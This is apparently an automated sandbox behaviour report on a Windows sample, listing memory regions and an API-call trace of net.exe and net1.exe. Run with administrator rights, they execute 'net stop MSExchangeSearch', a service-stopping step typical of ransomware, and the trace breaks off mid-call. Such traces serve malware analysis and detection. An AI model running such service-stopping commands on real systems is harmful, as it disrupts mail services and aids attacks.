region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 11858 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11859 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11860 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 11861 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11862 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11863 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11864 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11865 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 11866 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11867 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 11868 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 11869 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 723 os_tid = 0x518 Thread: id = 724 os_tid = 0xca4 Thread: id = 725 os_tid = 0x340 Process: id = "247" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1418c000" os_pid = "0xd0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "245" os_parent_pid = "0x42c" cmd_line = "net stop MSExchangeSearch" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11883 start_va = 0x220000 end_va = 0x239fff entry_point = 0x220000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 11884 start_va = 0xd70000 end_va = 0x4d6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d70000" filename = "" Region: id = 11885 start_va = 0x4d70000 end_va = 0x4d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d70000" filename = "" Region: id = 11886 start_va = 0x4d90000 end_va = 0x4d91fff entry_point = 0x0 region_type = private name = "private_0x0000000004d90000" filename = "" Region: id = 11887 start_va = 0x4da0000 end_va = 0x4db3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004da0000" filename = "" Region: id = 11888 start_va = 0x4dc0000 end_va = 0x4dfffff entry_point = 0x0 region_type = private name = "private_0x0000000004dc0000" filename = "" Region: id = 11889 start_va = 0x4e00000 end_va = 0x4e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e00000" filename = "" Region: id = 11890 start_va = 0x4e80000 end_va = 0x4e83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e80000" filename = "" Region: id = 11891 start_va = 0x4e90000 end_va = 0x4e90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e90000" filename = "" Region: id = 11892 start_va = 0x4ea0000 end_va = 0x4ea1fff entry_point = 0x0 region_type = private name = "private_0x0000000004ea0000" filename = "" Region: id = 11893 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 11894 start_va = 0x7f090000 end_va = 0x7f0b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f090000" filename = "" Region: id = 11895 start_va = 0x7f0b8000 end_va = 0x7f0b8fff entry_point = 0x0 region_type = private name = "private_0x000000007f0b8000" filename = "" Region: id = 11896 start_va = 0x7f0b9000 end_va = 0x7f0b9fff entry_point = 0x0 region_type = private name = "private_0x000000007f0b9000" filename = "" Region: id = 11897 start_va = 0x7f0bd000 end_va = 0x7f0bffff entry_point = 0x0 region_type = private name = "private_0x000000007f0bd000" filename = "" Region: id = 11898 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11899 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 11900 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 11901 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11902 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 11903 start_va = 0x4f10000 end_va = 0x4f1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f10000" filename = "" Region: id = 11904 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 11905 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 11906 start_va = 0x5080000 end_va = 0x517ffff entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 11907 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 727 os_tid = 0xe24 Thread: id = 728 os_tid = 0xa24 Process: id = "248" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x15798000" os_pid = "0x310" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "247" os_parent_pid = "0xd0c" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeSearch" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11908 start_va = 0xc50000 end_va = 0xc6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 11909 start_va = 0xc70000 end_va = 0xc71fff entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 11910 start_va = 0xc80000 end_va = 0xc93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c80000" filename = "" Region: id = 11911 start_va = 0xca0000 end_va = 0xcdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 11912 start_va = 0xce0000 end_va = 0xd5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 11913 start_va = 0xd60000 end_va = 0xd63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 11914 start_va = 0xd70000 end_va = 0xd70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d70000" filename = "" Region: id = 11915 start_va = 0xd80000 end_va = 0xd81fff entry_point = 0x0 region_type = private name = "private_0x0000000000d80000" filename = "" Region: id = 11916 start_va = 0x1080000 end_va = 0x10b1fff entry_point = 0x1080000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 11917 start_va = 0x10c0000 end_va = 0x50bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 11918 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 11919 start_va = 0x7ed70000 end_va = 0x7ed92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed70000" filename = "" Region: id = 11920 start_va = 0x7ed95000 end_va = 0x7ed95fff entry_point = 0x0 region_type = private name = "private_0x000000007ed95000" filename = "" Region: id = 11921 start_va = 0x7ed9a000 end_va = 0x7ed9cfff entry_point = 0x0 region_type = private name = "private_0x000000007ed9a000" filename = "" Region: id = 11922 start_va = 0x7ed9d000 end_va = 0x7ed9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ed9d000" filename = "" Region: id = 11923 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11924 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 11925 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 11926 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11927 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 11928 start_va = 0xda0000 end_va = 0xdaffff entry_point = 0x0 region_type = private name = "private_0x0000000000da0000" filename = "" Region: id = 11929 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 11930 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 11931 start_va = 0xdd0000 end_va = 0xecffff entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 11932 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 11933 start_va = 0xc50000 end_va = 0xc5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c50000" filename = "" Region: id = 11934 start_va = 0xc60000 end_va = 0xc63fff entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 11935 start_va = 0xed0000 end_va = 0xf8dfff entry_point = 0xed0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11936 start_va = 0xf90000 end_va = 0xfcffff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 11937 start_va = 0xfd0000 end_va = 0x104ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 11938 start_va = 0x51a0000 end_va = 0x51affff entry_point = 0x0 region_type = private name = "private_0x00000000051a0000" filename = "" Region: id = 11939 start_va = 0x74a00000 end_va = 0x74a2efff entry_point = 0x74a00000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 11940 start_va = 0x74a30000 end_va = 0x74a37fff entry_point = 0x74a30000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 11941 start_va = 0x74a40000 end_va = 0x74a4efff entry_point = 0x74a40000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 11942 start_va = 0x74a50000 end_va = 0x74a63fff entry_point = 0x74a50000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 11943 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 11944 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 11945 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 11946 start_va = 0x74b10000 end_va = 0x74b1ffff entry_point = 0x74b10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 11947 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 11948 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 11949 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 11950 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 11951 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 11952 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 11953 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 11954 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 11955 start_va = 0x7ec70000 end_va = 0x7ed6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ec70000" filename = "" Region: id = 11956 start_va = 0x7ed97000 end_va = 0x7ed99fff entry_point = 0x0 region_type = private name = "private_0x000000007ed97000" filename = "" Region: id = 11957 start_va = 0xc70000 end_va = 0xc73fff entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 11958 start_va = 0xd90000 end_va = 0xd92fff entry_point = 0xd90000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 11959 start_va = 0x50c0000 end_va = 0x50f1fff entry_point = 0x50c0000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\netmsg.dll.mui") Thread: id = 729 os_tid = 0xe2c [0139.968] GetModuleHandleA (lpModuleName=0x0) returned 0x1080000 [0139.968] __set_app_type (_Type=0x1) [0139.968] __p__fmode () returned 0x77ac4d6c [0139.968] __p__commode () returned 0x77ac5b1c [0139.968] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1087020) returned 0x0 [0139.969] __getmainargs (in: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690, _DoWildCard=0, _StartInfo=0x109f69c | out: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690) returned 0 [0139.969] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0139.969] GetConsoleOutputCP () returned 0x1b5 [0139.969] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a7020 | out: lpCPInfo=0x10a7020) returned 1 [0139.969] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.971] sprintf_s (in: _DstBuf=0xd5fd7c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0139.971] setlocale (category=0, locale=".437") returned="English_United States.437" [0139.973] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0139.973] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0139.973] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeSearch" [0139.973] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xd5fb24, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0139.973] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xd5fb18 | out: Buffer=0xd5fb18*=0xdd7fe8) returned 0x0 [0139.973] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xd5fb1c | out: Buffer=0xd5fb1c*=0xdd8000) returned 0x0 [0139.973] __iob_func () returned 0x77ac1208 [0139.973] _fileno (_File=0x77ac1208) returned 0 [0139.973] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0139.973] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0139.973] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0139.973] _wcsicmp (_String1="config", _String2="stop") returned -16 [0139.973] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0139.973] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0139.973] _wcsicmp (_String1="file", _String2="stop") returned -13 [0139.973] _wcsicmp (_String1="files", _String2="stop") returned -13 [0139.973] _wcsicmp (_String1="group", _String2="stop") returned -12 [0139.973] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0139.973] _wcsicmp (_String1="help", _String2="stop") returned -11 [0139.973] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0139.973] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0139.973] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0139.973] _wcsicmp (_String1="session", _String2="stop") returned -15 [0139.973] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0139.973] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0139.973] _wcsicmp (_String1="share", _String2="stop") returned -12 [0139.973] _wcsicmp (_String1="start", _String2="stop") returned -14 [0139.973] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0139.973] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0139.973] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0139.973] _wcsicmp (_String1="accounts", _String2="MSExchangeSearch") returned -12 [0139.973] _wcsicmp (_String1="computer", _String2="MSExchangeSearch") returned -10 [0139.973] _wcsicmp (_String1="config", _String2="MSExchangeSearch") returned -10 [0139.973] _wcsicmp (_String1="continue", _String2="MSExchangeSearch") returned -10 [0139.973] _wcsicmp (_String1="cont", _String2="MSExchangeSearch") returned -10 [0139.973] _wcsicmp (_String1="file", _String2="MSExchangeSearch") returned -7 [0139.973] _wcsicmp (_String1="files", _String2="MSExchangeSearch") returned -7 [0139.973] _wcsicmp (_String1="group", _String2="MSExchangeSearch") returned -6 [0139.973] _wcsicmp (_String1="groups", _String2="MSExchangeSearch") returned -6 [0139.973] _wcsicmp (_String1="help", _String2="MSExchangeSearch") returned -5 [0139.973] _wcsicmp (_String1="helpmsg", _String2="MSExchangeSearch") returned -5 [0139.974] _wcsicmp (_String1="localgroup", _String2="MSExchangeSearch") returned -1 [0139.974] _wcsicmp (_String1="pause", _String2="MSExchangeSearch") returned 3 [0139.974] _wcsicmp (_String1="session", _String2="MSExchangeSearch") returned 6 [0139.974] _wcsicmp (_String1="sessions", _String2="MSExchangeSearch") returned 6 [0139.974] _wcsicmp (_String1="sess", _String2="MSExchangeSearch") returned 6 [0139.974] _wcsicmp (_String1="share", _String2="MSExchangeSearch") returned 6 [0139.974] _wcsicmp (_String1="start", _String2="MSExchangeSearch") returned 6 [0139.974] _wcsicmp (_String1="stats", _String2="MSExchangeSearch") returned 6 [0139.974] _wcsicmp (_String1="statistics", _String2="MSExchangeSearch") returned 6 [0139.974] _wcsicmp (_String1="stop", _String2="MSExchangeSearch") returned 6 [0139.974] _wcsicmp (_String1="time", _String2="MSExchangeSearch") returned 7 [0139.974] _wcsicmp (_String1="user", _String2="MSExchangeSearch") returned 8 [0139.974] _wcsicmp (_String1="users", _String2="MSExchangeSearch") returned 8 [0139.974] _wcsicmp (_String1="msg", _String2="MSExchangeSearch") returned 2 [0139.974] _wcsicmp (_String1="messenger", _String2="MSExchangeSearch") returned -14 [0139.974] _wcsicmp (_String1="receiver", _String2="MSExchangeSearch") returned 5 [0139.974] _wcsicmp (_String1="rcv", _String2="MSExchangeSearch") returned 5 [0139.974] _wcsicmp (_String1="netpopup", _String2="MSExchangeSearch") returned 1 [0139.974] _wcsicmp (_String1="redirector", _String2="MSExchangeSearch") returned 5 [0139.974] _wcsicmp (_String1="redir", _String2="MSExchangeSearch") returned 5 [0139.974] _wcsicmp (_String1="rdr", _String2="MSExchangeSearch") returned 5 [0139.974] _wcsicmp (_String1=0x1081ffc, _String2="MSExchangeSearch") returned 10 [0139.974] _wcsicmp (_String1="work", _String2="MSExchangeSearch") returned 10 [0139.974] _wcsicmp (_String1="wksta", _String2="MSExchangeSearch") returned 10 [0139.974] _wcsicmp (_String1="prdr", _String2="MSExchangeSearch") returned 3 [0139.974] _wcsicmp (_String1="devrdr", _String2="MSExchangeSearch") returned -9 [0139.974] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeSearch") returned -1 [0139.974] _wcsicmp (_String1="server", _String2="MSExchangeSearch") returned 6 [0139.974] _wcsicmp (_String1="svr", _String2="MSExchangeSearch") returned 6 [0139.974] _wcsicmp (_String1="srv", _String2="MSExchangeSearch") returned 6 [0139.974] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeSearch") returned -1 [0139.974] _wcsicmp (_String1="alerter", _String2="MSExchangeSearch") returned -12 [0139.974] _wcsicmp (_String1="netlogon", _String2="MSExchangeSearch") returned 1 [0139.974] _wcsupr (in: _String="MSExchangeSearch" | out: _String="MSEXCHANGESEARCH") returned="MSEXCHANGESEARCH" [0139.974] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0xdd2638 [0139.976] GetServiceKeyNameW (in: hSCManager=0xdd2638, lpDisplayName="MSEXCHANGESEARCH", lpServiceName=0x10a8cb0, lpcchBuffer=0xd5fa94 | out: lpServiceName="", lpcchBuffer=0xd5fa94) returned 0 [0139.976] _wcsicmp (_String1="msg", _String2="MSEXCHANGESEARCH") returned 2 [0139.976] _wcsicmp (_String1="messenger", _String2="MSEXCHANGESEARCH") returned -14 [0139.976] _wcsicmp (_String1="receiver", _String2="MSEXCHANGESEARCH") returned 5 [0139.976] _wcsicmp (_String1="rcv", _String2="MSEXCHANGESEARCH") returned 5 [0139.976] _wcsicmp (_String1="redirector", _String2="MSEXCHANGESEARCH") returned 5 [0139.976] _wcsicmp (_String1="redir", _String2="MSEXCHANGESEARCH") returned 5 [0139.976] _wcsicmp (_String1="rdr", _String2="MSEXCHANGESEARCH") returned 5 [0139.977] _wcsicmp (_String1="workstation", _String2="MSEXCHANGESEARCH") returned 10 [0139.977] _wcsicmp (_String1="work", _String2="MSEXCHANGESEARCH") returned 10 [0139.977] _wcsicmp (_String1="wksta", _String2="MSEXCHANGESEARCH") returned 10 [0139.977] _wcsicmp (_String1="prdr", _String2="MSEXCHANGESEARCH") returned 3 [0139.977] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGESEARCH") returned -9 [0139.977] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGESEARCH") returned -1 [0139.977] _wcsicmp (_String1="server", _String2="MSEXCHANGESEARCH") returned 6 [0139.977] _wcsicmp (_String1="svr", _String2="MSEXCHANGESEARCH") returned 6 [0139.977] _wcsicmp (_String1="srv", _String2="MSEXCHANGESEARCH") returned 6 [0139.977] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGESEARCH") returned -1 [0139.977] _wcsicmp (_String1="alerter", _String2="MSEXCHANGESEARCH") returned -12 [0139.977] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGESEARCH") returned 1 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="WORKSTATION") returned -10 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="LanmanWorkstation") returned 1 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="SERVER") returned -6 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="LanmanServer") returned 1 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="BROWSER") returned 11 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="BROWSER") returned 11 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="MESSENGER") returned 14 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="MESSENGER") returned 14 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="NETRUN") returned -1 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="NETRUN") returned -1 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="SPOOLER") returned -6 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="SPOOLER") returned -6 [0139.977] _wcsicmp (_String1="MSEXCHANGESEARCH", _String2="ALERTER") returned 12 [0139.977] _wcsicmp 